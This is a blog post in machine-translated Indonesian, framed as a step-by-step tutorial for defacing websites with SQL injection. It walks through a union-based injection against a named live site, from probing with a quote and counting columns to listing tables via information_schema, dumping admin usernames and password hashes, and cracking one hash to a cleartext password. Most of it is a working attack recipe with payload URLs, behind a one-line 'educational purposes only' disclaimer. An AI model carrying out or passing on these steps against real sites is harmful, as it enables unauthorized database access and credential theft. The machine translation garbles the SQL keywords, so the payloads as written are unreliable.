Jumat, 13 Oktober 2017

Explore Hacking

The dark side of technology

SQL Injection | Step by step deface website

Apa itu injeksi SQL? 

SQL adalah singkatan dari Structured Query Language. Bahasanya sangat tinggi, maksud saya dekat dengan manusia. 
Seperti query SELECT, INSERT, DELETE, UPDATE digunakan untuk memilih, menambahkan data, menghapus data, memperbarui data 
secara 
bersamaan.SQL digunakan untuk merancang databses. Informasi disimpan dalam databses. 
SQL injection adalah kerentanan yang terjadi pada lapisan database aplikasi yang memungkinkan penyerang untuk melihat 
isi yang tersimpan dalam database. Kelemahan ini terjadi saat masukan pengguna tidak difilter atau 
disaring dengan tidak tepat. 
Contoh tautan laman web dalam format www.anything.com/something.php?something=something, contoh 
www.tartanarmy.com/news/news.php?id=130 .
Di sini kita melewati 130 ke database dan mengembalikan hasilnya sesuai dengan itu. Mari melampirkan satu kutipan di akhir (') yaitu 
www.tartanarmy.com/news/news.php?id=130'
dan kami mendapat kesalahan di layar karena menyertakan kutipan tunggal (') saat memproses hasilnya . Ini meyakinkan kita bahwa itu tidak menyaring masukan kita dan rentan diserang.

Beberapa dasar -:
Setiap database server memiliki database di dalamnya. Setiap database memiliki tabel di dalamnya, tabel memiliki kolom di dalamnya dan akhirnya data disimpan dalam kolom. Kami telah memilih database "explore_hacking" dari enam database. Its memiliki empat meja admin, artikel, produk, pelanggan. Setiap tabel memiliki kolom dan data lebih lanjut yang tersimpan di dalamnya. Misalnya kita memilih tabel 'admin', itu punya kolom id, username, password, email.  Apa itu information_schema? Ini adalah database informasi yang ada di semua database SQL severs (versi> 5) secara default. Ini berisi informasi seperti nama tabel, kolom ada di semua database lainnya. Kami telah membuka database "information_schema" yang hadir secara default dan tabel dinamakan "TABLES" dalam database.



  















 Tutorial ini hanya untuk tujuan pendidikan. Mohon jangan disalahgunakan. 
Masuk ke http://www.tartanarmy.com/news/news.php?id=130. Pada dasarnya kita akan mengirimkan kueri melalui URL untuk mendapatkan hasil kembali pada layar yang sesuai. Motifnya adalah untuk mendapatkan nama meja, nama colmun dimana username dan password disimpan dan akhirnya mengambilnya. Alih-alih menyalin dan menempelkan tautan panjang, cukup klik "klik di sini" dan buka di tab baru. 

Langkah 1Temukan jumlah kolom. 
Mari kita gunakan klausa "ORDER BY" di sini, ini digunakan untuk mengurutkan kolom. Pilih nomor berapa,
katakan 10. Di sini saya berasumsi bahwa kolom angka tidak boleh lebih dari 10. "-" digunakan untuk membuat sesuatu setelah komentar. 
Sekarang masuk ke URL ini
http://www.tartanarmy.com/news/news.php?id=130 memesan dengan 10 - klik di sini
Sebenarnya kami menginstruksikan itu mengurutkan hasilnya pada kolom ke-10. Tapi kami mengembalikan kesalahan, ini 
berarti jumlah kolom kurang dari 10. Lets menggantinya dengan 9. 

http://www.tartanarmy.com/news/news.php?id=130 memesan dengan 9. Tapi sekali lagi kami mendapat error Ini 
berarti jumlah kolom kurang dari 9. Seperti ini kita terus bergerak, sampai kita tidak mendapatkan error. 
Akhirnya kita mencapai '6' 
http://www.tartanarmy.com/news/news.php?id=130 memesan sampai 6 -
kami tidak mendapatkan error, ini berarti ada 6 colums. 

Langkah 2 . Temukan kolom rentan . 
Sekarang mari kita gunakan perintah "UNION ALL" dan "SELECT".
http://www.tartanarmy.com/news/news.php?id=-130 serikat memilih semua 1,2,3,4,5,6--. Klik di sini
Kami akan mendapatkan beberapa nomor di layar. Yang berani adalah kolom yang paling rentan. 
Dalam hal ini yang paling rentan adalah nomor 2.



Langkah 3 . Temukan versi database 
Ganti kolom yang paling rentan dengan "@@ version" atau "verson ()" (jika yang pertama tidak bekerja). 
http://www.tartanarmy.com/news/news.php?id=-130 serikat pilih semua 1, @@ versi, 3,4,5,6-- Klik di sini
Kami mendapatkan versi di layar. Ini. Satu-satunya hal yang perlu diperhatikan adalah versi 5 poin adalah sesuatu yang
lebih besar dari 5. Kita akan mengikuti beberapa pendekatan lain jika versinya
kurang dari 5 karena tidak ada database secara default seperti "information_schema" yang menyimpan informasi tentang tabel / kolom database lainnya dalam versi kurang dari 5. Langkah 4 . Menemukan nama tabel Ganti kolom rentan no. dengan "table_name".



http://www.tartanarmy.com/news/news.php?id=-130 union pilih semua 1, table_name, 3,4,5,6 dari  
 information_schema.tables dimana table_schema = database () - 
Klik disini
Kami mendapat nama tabel pertama di layar

Untuk mendapatkan semua tabel gunakan group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union pilih semua 1, group_concat (table_name), 3,4,5,6 dari information_schema.tables dimana table_schema = database () - Klik sini

Langkah 5 . Menemukan nama kolom 
Simlary mendapatkan semua kolom dengan hanya mengganti 'tabel' dengan 'kolom' 
http://www.tartanarmy.com/news/news.php?id=-130 serikat pilih semua 1, group_concat (column_name), 3,4,5 , 6 dari 
information_schema.columns dimana table_schema = database () - 
Klik disini
Ada elemen berulang seperti pada kasus ini adalah 'id'. Dari sini, kita bisa mengetahui nomor tabel 
mana yang memiliki kolom mana?


Langkah 6. Ambil data dari kolom. 
Kita bisa mengambil data yang tersimpan di kolom manapun. Tapi yang menarik disini adalah username dan password. 
Kolom ini ada di tabel pertama yaitu tar_admin. "0x3a" digunakan hanya untuk memasukkan usus besar dalam hasil untuk memisahkannya, itu adalah hex of colon. 

http://www.tartanarmy.com/news/news.php?id=-130 serikat memilih semua 1, group_concat (nama pengguna, 0x3a, kata sandi), 3,4,5,6 dari tar_admin--. Klik Disini Jadi akhirnya kita mendapat username dan password di layar. Tapi password dienkripsi. Sebagian besar enkripsi ini bisa dihapus. Mari memilih nama pengguna mengatakan "Sneds". Kata sandi dalam bentuk terenkripsi adalah 7d372d3f4ad3116c9e455b20e946dd15. Masuk ke http://md5crack.com/crackmd5.php dan pasang kata sandi hashed (terenkripsi) di sini.




Dan itu akan retak bagi kita. Kami mendapat 'oorwullie' hasilnya (kata kunci dalam teks yang jelas).


Catatan: Hash adalah jenis enkripsi yang tidak dapat diubah. Ada banyak kerupuk online yang tersedia. Terus mencoba. Terkadang hash yang sangat kuat tidak bisa retak

Tidak ada komentar:

Posting Komentar

 
Explore Hacking © 2011 Templates | uzanc